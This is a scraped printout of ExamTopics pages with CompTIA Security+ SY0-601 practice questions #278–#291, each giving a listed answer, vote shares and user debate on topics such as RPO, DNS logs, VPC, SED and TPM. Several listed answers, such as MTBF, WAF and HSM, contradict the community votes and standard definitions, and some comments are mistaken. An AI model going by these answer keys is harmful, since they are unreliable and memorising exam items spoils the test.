C. The provenance of the artifacts

Explanation:
A digital forensics chain-of-custody form is a document that provides a clear and complete record of the sequence of events that occurs from the
time a digital artifact is collected until it is analyzed and used as evidence. The form should include the date and time when the artifact was
collected, so that the exact time it was obtained can be determined. Additionally, the form should include information about the provenance of
the artifact, such as its origin and any steps that have been taken to maintain its integrity. The order of volatility, a CRC32 checksum, the vendor’s
name, and a warning banner are not essential components of a digital forensics chain-of-custody form.
upvoted 2 times

  carpathia 2 months, 1 week ago


Again on the CRC32 chacksum, it can't be an answer, read the table on CRC and hash:

https://www.researchgate.net/publication/279174845_Im_Proving_Chain_of_Custody_and_Digital_Evidence_Integrity_with_Time_Stamp
upvoted 1 times

  carpathia 2 months, 1 week ago


CRC32 checksum is not a hash. I am still not sure.

What a form should contain:


What is the evidence?: For example- digital information includes the filename, md5 hash, and Hardware information includes serial number, asset
ID, hostname, photos, description.
How did you get it?: For example- Bagged, tagged or pulled from the desktop.
When it was collected?: Date, Time
Who has handle it?
Why did that person handled it?
Where was it stored?: This includes the information about the physical location in which proof is stored or information of the storage used to
store the forensic image.
How you transported it?: For example- in a sealed static-free bag, or in a secure storage container.
How it was tracked?
How it was stored?: For example- in a secure storage container.
Who has access to the evidence?: This involves developing a check-in/ check-out process.
upvoted 1 times

  BluEric 2 months, 3 weeks ago


Selected Answer: BE
Integrity and Time Stamps - BE work for me here.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: CE
I would go with CE. Who collected the evidence (if that what is meant by provenance) and time has to be recorded. Digest/Hash has to be
recorded, but CRC is not a hash as it is reversible. God help us...
upvoted 4 times

  Sandon 1 week, 2 days ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 468/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

This is the one


upvoted 1 times

  kausalya2022 2 months, 3 weeks ago


Selected Answer: BE
Checksum for integrity
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: CE
CE would be my prefered option too. "A" is important for the forensic analyst gathering the data, but not for the chain of custody.
upvoted 1 times

  comeragh 2 months, 3 weeks ago


Selected Answer: AE
Going for A&E here. This was from old bank of questions.
upvoted 2 times

  ksave 2 months, 3 weeks ago


Selected Answer: CE
Order of Volatility is for collecting the the most volatile evidence first for data acquisition. It should not be in the chain of custody form.
upvoted 2 times

  kstevens11 2 months, 3 weeks ago


Selected Answer: CE
I would go with E for sure, as date and time is crucial. Then, option C for provenance of the data -- NIST defines provenance as "The chronology
of the origin, development, ownership, location, and changes to a system or system component and associated data". Source --
https://csrc.nist.gov/glossary/term/provenance#:~:text=Definition(s)%3A,%2C%20component%2C%20or%20associated%20data.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 469/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #278 Topic 1

An organization is migrating several SaaS applications that support SSO. The security manager wants to ensure the migration is completed
securely. Which of the following application integration aspects should the organization consider before focusing into underlying implementation
details? (Choose two.)

A. The back-end directory source

B. The identity federation protocol

C. The hashing method

D. The encryption method

E. The registration authority

F. The certificate authority

Correct Answer: BD

Community vote distribution


BF (55%) BE (27%) AB (18%)

  atrax Highly Voted  2 months, 3 weeks ago


Selected Answer: BF
Certification covers both encryption and hashing
upvoted 6 times

  ksave Highly Voted  2 months, 3 weeks ago


Shouldn't it be B and F? F would cover both the encryption and hashing method.
upvoted 5 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: AB
The organization should consider the identity federation protocol and the back-end directory source before focusing into underlying
implementation details during migration of several SaaS applications that support SSO.

A. Identity Federation Protocol: The identity federation protocol helps in establishing trust between different organizations and systems for secure
exchange of identity information between them. This helps to securely integrate multiple applications that support SSO and facilitates secure
authentication of the users.

B. Back-end Directory Source: A back-end directory source is used to store user identities and credentials and to perform authentication of the
users. The organization needs to consider the integration of back-end directory sources of the SaaS applications with its existing infrastructure,
to ensure secure and seamless migration of the SaaS applications.
upvoted 2 times

  GetBuckets 1 month, 3 weeks ago


I’d go B & F here.
upvoted 4 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: BE
I believe it’s B & E

The organization should consider the identity federation protocol and the registration authority before focusing on underlying implementation
details. These aspects are related to how the applications will integrate with each other and with the organization's existing single sign-on (SSO)
infrastructure. The identity federation protocol is the standard that will be used to communicate between the applications and the SSO system,
while the registration authority is the entity responsible for registering the applications with the SSO system and managing their access to the
system.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 470/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #279 Topic 1

A security analyst has been tasked with finding the maximum amount of data loss that can occur before ongoing business operations would be
impacted. Which of the following terms BEST defines this metric?

A. MTTR

B. RTO

C. RPO

D. MTBF

Correct Answer: D

Community vote distribution


C (100%)

  yasuke Highly Voted  2 months, 3 weeks ago


Recovery point objective (RPO) is the maximum acceptable amount of data loss after an unplanned data-loss incident, expressed as an amount
of time. This is generally thought of as the point in time before the event at which data can be successfully recovered -- that is, the time elapsed
since the most recent reliable backup.
upvoted 9 times

  no_name_ Highly Voted  2 months, 2 weeks ago


Selected Answer: C
I don't think whoever marked the "right" answers has passed this exam
upvoted 6 times

  atrax Most Recent  2 months, 3 weeks ago


Selected Answer: C
C, RPO is about data.
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
Recovery point objective (RPO) is the correct answer
upvoted 2 times

  IzzyLeon 2 months, 3 weeks ago


RPO is your goal for the maximum amount of data the organization can tolerate losing.

MTBF is the average time between system breakdowns.

Question is asking for maximum amount of data loss that can occur before impacting business.
upvoted 1 times

  ksave 2 months, 3 weeks ago


Selected Answer: C
RPO-->acceptable downtime
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 471/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #280 Topic 1

The IT department's on-site developer has been with the team for many years. Each time an application is released, the security team is able to
identify multiple vulnerabilities. Which of the following would BEST help the team ensure the application is ready to be released to production?

A. Limit the use of third-party libraries.

B. Prevent data exposure queries.

C. Obfuscate the source code.

D. Submit the application to QA before releasing it.

Correct Answer: D

Community vote distribution


D (100%)

  pgonza 1 month, 4 weeks ago


Selected Answer: D
QA is quality assurance, so if the apps always have bugs, let the QA team view before leasing.
upvoted 1 times

  03allen 2 months, 3 weeks ago


Fire the developer 😁
upvoted 4 times

  comeragh 2 months, 3 weeks ago


Selected Answer: D
Agree with D here. This was from the old bank of questions also.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 472/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #281 Topic 1

During a security incident investigation, an analyst consults the company’s SIEM and sees an event concerning high traffic to a known, malicious
command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which
of the following can provide this information?

A. WAF logs

B. DNS logs

C. System logs

D. Application logs

Correct Answer: B

Community vote distribution


B (67%) C (33%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: B
Answer: DNS

DNS logs can contain a record for every query and response. It can show the IP addresses and domain names that your system should/shouldn't
be communicating with, it can reveal malware calling out to its command-and-control server, or data transfers to non-company locations. This is
one of the reasons why DNS logs are some of the most valuable logs to import into a SIEM system.
upvoted 10 times

  lizb7223 3 weeks, 1 day ago


DNS logs
https://www.geeksforgeeks.org/top-9-common-security-log-sources/?ref=gcse
number 9 states that DNS logs do address command and control as well.
upvoted 1 times

  Lv2023 Most Recent  1 month, 2 weeks ago


Selected Answer: B
DNS event logs can hold a variety of information that may supply useful security intelligence, such as:

The types of queries a host has made to DNS.


Hosts that are in communication with suspicious IP address ranges or domains.
upvoted 1 times

  johnajwer 2 months, 2 weeks ago


Selected Answer: C
Answer is C
B is incorrect as we are dealing with a command-and-control server. System logs are vital for this.
upvoted 2 times

  Sandon 2 months, 1 week ago


Why does change the answer? Seems like DNS logs would still tell you which workstations connected to it.
upvoted 2 times

  Sandon 1 week, 2 days ago


I take it back, you're correct
upvoted 1 times

  carpathia 2 months, 3 weeks ago


Selected Answer: B
DNS logs would contain that info. System logs don't necessarely.
upvoted 3 times

  atrax 2 months, 3 weeks ago


Selected Answer: C
System logs or Syslogs is correct.
upvoted 2 times

  ksave 2 months, 3 weeks ago


Selected Answer: C
System logs contain logs from multiple source and therefore should provide all the impacted workstations.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 473/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 3 times

Question #282 Topic 1

A company has a flat network that is deployed in the cloud. Security policy states that all production and development servers must be
segmented. Which of the following should be used to design the network to meet the security requirements?

A. CASB

B. VPC

C. Perimeter network

D. WAF

Correct Answer: D

Community vote distribution


B (100%)

  okay123 Highly Voted  2 months, 2 weeks ago


VPC: Virtual private cloud ohh! See the hardest part is just memorizing all these damn acyromns argH!
upvoted 10 times

  okay123 1 month, 3 weeks ago


Ameen sister! this keeps happening argh
upvoted 3 times

  IzzyLeon Most Recent  2 months, 3 weeks ago


Selected Answer: B
"Security policy states that all production and development servers must be segmented" which can be achieved by using a VPC
upvoted 1 times

  ksave 2 months, 3 weeks ago


Selected Answer: B
VPC consists of cloud resources isolated from other cloud resources.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: B
VPC should be the right answer here, as you could use multiple VPCs within your cloud enviroment to segementate the network
upvoted 1 times

  kstevens11 2 months, 3 weeks ago


Selected Answer: B
My thoughts are that a VPC offers segmentation in a cloud environment.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 474/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #283 Topic 1

A new plug-and-play storage device was installed on a PC in the corporate environment. Which of the following safeguards will BEST help to
protect the PC from malicious files on the storage device?

A. Change the default settings on the PC.

B. Define the PC firewall rules to limit access.

C. Encrypt the disk on the storage device.

D. Plug the storage device in to the UPS.

Correct Answer: C

Community vote distribution


C (57%) A (33%) 10%

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Answer: Encrypt the disk on the storage device.

Encrypting the disk on the drive could work because if the files on the storage drive is encrypted that means the data will be in a format that can't
be used by other devices anyway.

The PC is in a corporate environment so they're likely using Active Directory where they can implement a GPO to encrypt removable drives when
plugged in to a PC using BitLocker.

Just to note, I don't think "A" is wrong because I'm pretty sure windows has that AutoPlay function where you could automatically run certain
files or even install software when something plugged in but I'm pretty sure it's not a default setting sort of thing.

Anyway, this is the last question in the review for me and I'm scheduled to take my test in a few days so good luck to you guys and wish me luck
:)
upvoted 14 times

  VHuckle 2 days, 18 hours ago


I'm sorry, but encrypting the device does NOTHING to stop the activation of any malicious code on the device. Note the question states "A
new plug and play device was installed..." It's already connected, and the instant it made contact, any malicious code would execute before
the encryption could complete.

All encryption does is prevent the data from being read/accessed AFTER REMOVAL.
upvoted 2 times

  SOK_I 2 months, 2 weeks ago


Good luck man. Though, you've already taken it by this point. Just wanted to say how grateful I am that you leave such detailed posts. You
and Stoneface are my heros. Gonna be testing tomorrow, really relying on both of you guys. Thank you for what you've done here.
upvoted 2 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: A
A. Change the default settings on the PC.

To protect the PC from malicious files on the storage device, it is best to change the default settings on the PC. This includes enabling antivirus
software, configuring software and hardware firewalls, enabling automatic updates, and setting up access controls to prevent unauthorized users
from accessing the PC. By changing the default settings, the PC can be better protected against malicious files and other security threats,
including those on the storage device. Additionally, the PC should have up-to-date virus definition files and other security software to detect and
prevent malicious files from executing on the PC.
upvoted 2 times

  madmax1984 2 weeks, 2 days ago


Selected Answer: C
Data encryption protects data wherever it lives. Once data is encrypted and the encryption key is secured, the data becomes useless to any
cybercriminal. If that data is already encrypted, that makes it much more difficult for the malware to detect it and attack.
upvoted 1 times

  Jimbobilly 1 month, 3 weeks ago


Selected Answer: B
One way to protect a PC from malicious files on a storage device is to define the firewall rules on the PC to limit access. This can help to prevent
unauthorized access to the PC from the storage device, and can help to prevent the spread of malware or other malicious files.
upvoted 2 times

  FMMIR 1 month, 3 weeks ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 475/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
To protect the PC from malicious files on the storage device, the best option is to define the PC firewall rules to limit access. By configuring the
firewall on the PC to block incoming and outgoing traffic from unknown sources, the company can prevent malicious files on the storage device
from communicating with the internet and infecting the PC. This will help to safeguard the PC against malware and other threats that may be
present on the storage device.
upvoted 1 times

  HL2020 1 month, 4 weeks ago


Selected Answer: A
Got to be A. I don't see the others making sense. Encrypting the plug and play device wouldn't seem to protect the PC.
upvoted 4 times

  JakeBusey 2 months ago


Selected Answer: A
A

Change default settings refers to disabling autorun.

What is encryption going to prevent in this scenario? Case in point, enable BitLocker or FileVault on your OS drive and then plug a USB flash
drive into the computer.

Can the USB drive communicate with the encrypted OS drive? Yes.
Can they see each other's files? Yes.
So what does this prevent? Nothing.

Encryption would be great if someone were to remove the drive from your computer and try to read the data off of it. But when you're actively
using the computer, the drive is UNLOCKED.
upvoted 3 times

  carpathia 2 months, 3 weeks ago


Selected Answer: A
"plug-and-play storage device" this would point to A, even though these types of hints may be both helpful and misleading.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I am not sure how encrypting a disk would protect against malware execution. I have seen this on q 267 by encrypting a usb stick upon
insertion. OK, there maybe policies set by the admin to encrypt a storage device or usb stick to avoid malicious use? SOmeone who worked
in the field can help us out. I haven't heard of this sort of thing
upvoted 1 times

  nobnarb 2 months, 3 weeks ago


Selected Answer: C
I don't know for sure, but I have been studying Sec+ for 5 months and test in 1 week. This is the best answer I could find.
upvoted 2 times

  comeragh 2 months, 3 weeks ago


Taking the exam in a little over 10 hours. See you on the other side :)
upvoted 4 times

  no_name_ 2 months, 3 weeks ago


I think it's C too. I think I'll take mine next week, let us know what your score is and how the PBQ's go! GL
upvoted 1 times

  comeragh 2 months, 3 weeks ago


I found my old bank of old questions and I had this as C. Open for discussion.
upvoted 1 times

  comeragh 2 months, 3 weeks ago


Other sites listing A as the correct answer here. Taking the exam tomorrow 10/11.
upvoted 2 times

  no_name_ 2 months, 3 weeks ago


I agree, I'm thinking A, it doesn't have to go through a firewall, a firewall would work for something with an air gap. I could be mistaken
though, somebody feel free to let me know if I'm wrong. Let us know how you do bro.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 476/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #284 Topic 1

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the
following solutions would BEST support the policy?

A. Mobile device management

B. Full-device encryption

C. Remote wipe

D. Biometrics

Correct Answer: A

Community vote distribution


A (100%)

  diegomatheus00 2 weeks ago


Selected Answer: A
MDM -> Correto
upvoted 1 times

  techygirl 2 months ago


Selected Answer: A
MDM is correct
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 477/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #285 Topic 1

A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss.
Which of the following would be the BEST backup strategy to implement?

A. Incremental backups followed by differential backups

B. Full backups followed by incremental backups

C. Delta backups followed by differential backups

D. Incremental backups followed by delta backups

E. Full backups followed by differential backups

Correct Answer: E

Community vote distribution


E (100%)

  Ranaer 2 days, 23 hours ago


Selected Answer: E
The correct answer here is to use differential backup. When using this type of back up, there are two alternatives:
1 - Something bricks on the day of the full backup, you need only that full backup to restore your system.
2 - Something bricks after the day when a full backup is conducted. In that case you only need two things, the full backup and the most recent
differential backup.

With incremental you need your full backup followed by every single backup made since then till the point of failiure.
upvoted 1 times

  Sandon 1 week, 2 days ago


It's B
upvoted 1 times

  madmax1984 2 weeks, 2 days ago


Selected Answer: E
Anwser is E
upvoted 1 times

  GetBuckets 1 month, 3 weeks ago


That’s E. Full backup followed by differential backups.
upvoted 1 times

  GetBuckets 1 month, 3 weeks ago


With differential backup, you only need the latest differential backup + the original full backup. With incremental, you will need all the
incremental backups (could be too many) + the original backup. Refer to Ian Neil’s book (Figure 12.10) which explains it perfectly.
upvoted 2 times

  GetBuckets 1 month, 3 weeks ago


With incremental, you will need all the incremental backups (could be too many) + the original FULL backup.
upvoted 1 times

  nunulong 1 month, 4 weeks ago


As the question suggests to reduce the number of backups that need to be restored in case of data loss, The most recent differential will be a
collection of all the changes since a full backup was done, whereas the incremental backups have to load each individual incremental as well as
the full backup. I think the correct answer is E which requires fewer number of backup files to restore the data.
upvoted 2 times

  [Removed] 1 month, 4 weeks ago


Differential backups only back up the files that have changed since the previous full backup, while incremental backups do the same, they back
up the files that have changed since the previous incremental or full backup.

Either B or E? Open for discussion..


upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 478/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  JSOG 2 months ago


Selected Answer: E
Differential backups are quicker than full backups because so much less data is being backed up. But the amount of data being backed up
grows with each differential backup until the next full back up. Differential backups are more flexible than full backups, but still unwieldy to do
more than about once a day, especially as the next full backup approaches.
upvoted 2 times

Question #286 Topic 1

The compliance team requires an annual recertification of privileged and non-privileged user access. However, multiple users who left the
company six months ago still have access. Which of the following would have prevented this compliance violation?

A. Account audits

B. AUP

C. Password reuse

D. SSO

Correct Answer: A

Community vote distribution


A (100%)

  ronniehaang 3 days, 22 hours ago


Selected Answer: A
A. Account audits would have prevented this compliance violation by periodically reviewing the access permissions of users and removing those
who are no longer with the company. An annual account audit would have identified the users who left the company six months ago and their
access could have been revoked to ensure compliance with the recertification requirement. The account audit would have verified the accuracy
of the access control lists and ensured that all access privileges are in line with current business requirements.
upvoted 1 times

  Alizadeh 1 month, 1 week ago


Selected Answer: A
A. Account audits would have prevented this compliance violation.

Account audits are periodic reviews of user accounts to ensure that they are being used appropriately and that access is being granted and
revoked in accordance with the organization's policies and procedures. If the compliance team had been conducting regular account audits, they
would have identified the users who left the company six months ago and ensured that their access was revoked in a timely manner. This would
have prevented the compliance violation caused by these users still having access to the company's systems.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
To prevent this compliance violation, the company should implement account audits. An account audit is a regular review of all user accounts to
ensure that they are being used properly and that they are in compliance with the company's security policies. By conducting regular account
audits, the company can identify inactive or unused accounts and remove access for those users. This will help to prevent compliance violations
and ensure that only authorized users have access to the company's systems and data.
upvoted 1 times

  JSOG 2 months ago


Selected Answer: A
agree with A, if accounts were audited, they will know that there are some accounts that had to be deleted
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 479/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #287 Topic 1

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area.
Which of the following would MOST likely have prevented this breach?

A. A firewall

B. A device pin

C. A USB data blocker

D. Biometrics

Correct Answer: C

Community vote distribution


C (71%) D (29%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
A USB data blocker would most likely have prevented the data breach in this scenario. A USB data blocker is a device that blocks data transfer
over USB connections. It can be used to protect against attacks that involve connecting a malicious USB device, such as a charger or USB drive,
to a computer or other device. In this scenario, the executive was charging a phone in a public area and likely connected the phone to a USB
charging port. If the charging port had been equipped with a USB data blocker, it would have prevented any data transfer between the phone and
the charging port, and the breach would not have occurred. A firewall, device pin, or biometrics would not have prevented this type of attack.
upvoted 2 times

  okay123 1 month, 3 weeks ago


Selected Answer: C
A USB data blocker allows you to plug into Wi-Fi hotspots and USB charging ports safely. These solutions eliminate the risk of infecting your
phone, laptop, or tablet with malware, and also prevent hackers from install and running malicious code on your system.

Its DEF C!
upvoted 3 times

  beb252 1 month, 4 weeks ago


Selected Answer: D
I haven't seen any phone with a USB yet.
upvoted 2 times

  kirochey 3 days ago


Usb charger?
upvoted 1 times

  Ranaer 2 days, 23 hours ago


Quite literally every modern phone uses a USB cable? The time of chargers directly attached to the cable ended about 15 years ago.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 480/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #288 Topic 1

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer
is an example of a __________.

A. data controller.

B. data owner.

C. data custodian.

D. data processor.

Correct Answer: B

Community vote distribution


C (69%) D (31%)

  asum 2 weeks, 3 days ago


Selected Answer: C
As Comptia Guide mention.
Data custodian—this role handles managing the system on which the data assets
are stored. This includes responsibility for enforcing access control, encryption, and
backup/recovery measures
upvoted 2 times

  nicekoda 1 month, 1 week ago


The answer is C. Data Custodian is responsible for implementing and maintaining security controls for a given data set in order to meet the
requirements specified by the Data Owner in the Data Governance Framework
upvoted 1 times

  Sanjucbsa 1 month, 2 weeks ago


Selected Answer: D
Data Processor: a computer or person that carries out operations on data to retrieve, transform, or classify information.
upvoted 1 times

  Sandon 1 week, 2 days ago


No sir
upvoted 2 times

  Jimbobilly 1 month, 3 weeks ago


Selected Answer: D
A data custodian is a person or entity that is responsible for maintaining and protecting data on behalf of the data owner.
upvoted 1 times

  Jimbobilly 1 month, 3 weeks ago


In this scenario, the security engineer is responsible for applying encryption to the data on a hard disk. This makes the security engineer a
data processor, as they are processing the data on behalf of the data controller (the manager who is responsible for the data set).
upvoted 1 times

  GetBuckets 1 month, 3 weeks ago


It’s D. The Data Processor. See this official link: https://www.legislation.gov.uk/eur/2016/679/article/32
upvoted 2 times

  sauna28 1 month, 3 weeks ago


Selected Answer: D
Based on professor messer's video, i believe the answer is D
upvoted 1 times

  kholdsnare 1 month, 3 weeks ago


Selected Answer: D
Manager who is responsible for a data set -> data owner
Data Processor – typically an entity that works under the direction of the owner/controller, such as an IT department.
The security engineer is a Data Processor in this case.
https://cissprep.net/data-ownership/
upvoted 2 times

  JSOG 2 months ago


Selected Answer: C
agree with C
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 481/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  FMMIR 2 months ago
Selected Answer: C
Data custodian: Responsible for the safe custody, transport, and storage of the data and implementation of business rules.
Data owner: Holds legal rights and complete control over data elements.
Data controller: The natural or legal person, public authority, agency, or any other body that alone or jointly with others determines the purposes
and means of the processing of personal data. Where the purposes and means of processing are determined by national or community laws or
regulations, the controller or the specific criteria for the nomination of the controller may be designated by national or community law.
Data processor: A natural or legal person, public authority, agency, or any other body that processes personal data on behalf of the controller.
There are situations where an entity can be a data controller, or a data processor, or both.
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


I did more research on this and the answer is D.

The security engineer who is tasked with encrypting the data on a hard disk is an example of a data processor. A data processor is an
individual or organization that processes personal data on behalf of a data controller. In this scenario, the manager who is responsible for the
data set is the data controller, and the security engineer is the data processor. The data processor is responsible for ensuring that the data is
processed in accordance with the instructions of the data controller and in compliance with any applicable laws or regulations. The security
engineer is not the data owner or data custodian in this scenario. The data owner is the individual or organization that has ultimate control
over the data, and the data custodian is responsible for physically storing and protecting the data.
upvoted 3 times

  sauna28 1 month, 3 weeks ago


agreed, answer is D
upvoted 2 times

  zaac22 2 months ago


C: data custodian
upvoted 1 times

  techygirl 2 months ago


Selected Answer: C
DATA CUSTODIAN is correct
upvoted 3 times

  Lv2023 2 months ago


Selected Answer: C
Data custodian is responsible for enforcing access control, encryption, and backup/recovery measures. Hence the engineer is acting as a data
custodian when he or she full fills the data owners request of encrypting the data.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 482/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #289 Topic 1

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following
would be the MOST acceptable?

A. SED

B. HSM

C. DLP

D. TPM

Correct Answer: B

Community vote distribution


A (61%) D (39%)

  FMMIR Highly Voted  1 month, 3 weeks ago


Selected Answer: A
A. SED (self-encrypting drive) would be the most acceptable option for an organization with a low tolerance for user inconvenience that wants to
protect laptop hard drives against loss or data theft. SEDs are hardware-based encryption devices that automatically encrypt data on a hard
drive without requiring any additional input or configuration from the user. This means that the user does not have to perform any additional steps
to encrypt their data, which can help to prevent data loss or theft. By contrast, other options like HSM (hardware security module), DLP (data loss
prevention), and TPM (trusted platform module) may require more user involvement and may not be as convenient for users.
upvoted 9 times

  ronniehaang Most Recent  3 days, 22 hours ago


Selected Answer: A
The most acceptable option for the organization to protect laptop hard drives against loss or data theft would be SED (Self-Encrypting Drive).
SED provides hardware-level encryption of the entire hard drive, and it is transparent to the user. This means that the user does not have to take
any additional steps to encrypt their data, and the encryption process does not affect the performance of the laptop. Additionally, SEDs are
tamper-resistant and provide protection against theft and loss of data. This makes them an ideal solution for organizations with low tolerance for
user inconvenience.
upvoted 1 times

  IzaacL23 1 month, 1 week ago


Selected Answer: A
100% SED
upvoted 1 times

  nicekoda 1 month, 1 week ago


The answer is A, TPM is a built-in component on a SED to speed up cryptographic operations and protect keys while SED can be utilized to
encrypt and decrypt the stored data, occurring within the device and without dependence on a connected information system.
upvoted 2 times

  Jimbobilly 1 month, 3 weeks ago


Selected Answer: A
See FMMIR response
upvoted 2 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: D
TPM is the Answer
upvoted 1 times

  GetBuckets 1 month, 3 weeks ago


I find this question annoying as SED, TPM and HSM are things to consider, but I’m going with SED as per Ian Neil’s book: “Exam Tip: Use SED to
protect the data on lost or stolen laptops. Only the user and vendor can decrypt the data.”

We would’ve decided better if the question provided more information about the use case, but it’s too generic. So I’d go by the book and choose
A.
upvoted 1 times

  okay123 1 month, 3 weeks ago


Selected Answer: D
I think i will go with D because the key words "user inconvenice."

A TPM isn’t something you have to think about much. Your computer either has a TPM or it doesn’t — and modern computers generally will. An
SED drive is an external drive connected to your laptop, that's a whole other situation.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 483/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

" TPM is arguably more of a convenience feature. Storing the encryption keys in hardware allows a computer to automatically decrypt the drive,
or decrypt it with a simple password. It’s more secure than simply storing that key on the disk, as an attacker can’t simply remove the disk and
insert it into another computer. It’s tied to that specific hardware."

https://www.howtogeek.com/237232/what-is-a-tpm-and-why-does-windows-need-one-for-disk-encryption/

It was literally made to be convenient!


upvoted 4 times
  [Removed] 1 month, 4 weeks ago
Having a TPM encrypts the login process, and it can encrypt the data within the device as well. Any unauthorised user cannot access the data
inside. Even if the device is lost or stolen, your data is protected with TPM.
upvoted 1 times

  Done461 2 months ago


Selected Answer: A
SED the right answer
upvoted 2 times

  Blueteam 2 months ago


Correct answer is A: SED
The emphasize is on user convenience. Self Encryption Drive is the most convenince.
upvoted 2 times

  sterfryy 2 months ago


Selected Answer: A
Self-encrypting drive (SED)
upvoted 2 times

  JSOG 2 months ago


Selected Answer: D
agree with TPM
upvoted 3 times

  zaac22 2 months ago


A : SED includes the hardware and software to encrypt all data on the drive and
securely store the encryption keys. These typically allow users to enter
credentials when they set up the drive. When users power up the system,
they enter their credentials again to decrypt the drive and boot the system
upvoted 2 times

  FMMIR 2 months ago


Selected Answer: D
A TPM (Trusted Platform Module) is used to improve the security of your PC. It's used by services like BitLocker drive encryption, Windows Hello,
and others, to securely create and store cryptographic keys, and to confirm that the operating system and firmware on your device are what
they're supposed to be, and haven't been tampered with.
upvoted 3 times

  nicekoda 2 months ago


TPM is the correct answer. It protects the hard drive and data through encryption.
upvoted 3 times

  nicekoda 2 months ago


I think HSM is actually the MOST suitable answer since you can’t apply TPM on a computer that is currently in use.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 484/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #290 Topic 1

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager
use to control the network traffic?

A. A DMZ

B. A VPN

C. A VLAN

D. An ACL

Correct Answer: D

Community vote distribution


D (100%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The network manager should use an Access Control List (ACL) to control the traffic between the segments. An ACL is a network filter that can be
used to control the flow of network traffic based on various criteria, such as the source or destination of the traffic, the type of traffic, or the port
number. By configuring an ACL, the network manager can specify which types of traffic are allowed to pass between the network segments and
which are not. This will help to prevent unauthorized or malicious traffic from passing between the segments and potentially compromising the
network. A DMZ, VPN, or VLAN would not be appropriate for controlling the traffic between the segments in this scenario.
upvoted 4 times

  JSOG 2 months ago


Selected Answer: D
According to 2 sources
What is Access Control List (ACL) in networking? Access Control List or ACL is a network filter that is often used by network devices like routers
and switches to control network traffic. ACL can be used on a network interface to control the network traffic passing through the interface
upvoted 3 times

  zaac22 2 months ago


D: use an acl to control traffic between segments, vlan is already implemeted
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 485/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #291 Topic 1

Which of the following BEST describes when an organization utilizes a ready-to-use application from a cloud provider?

A. IaaS

B. SaaS

C. PaaS

D. XaaS

Correct Answer: B

Community vote distribution


B (100%)

  Alizadeh 1 month, 2 weeks ago


Selected Answer: B
The use of a ready-to-use application from a cloud provider is an example of using software as a service (SaaS).

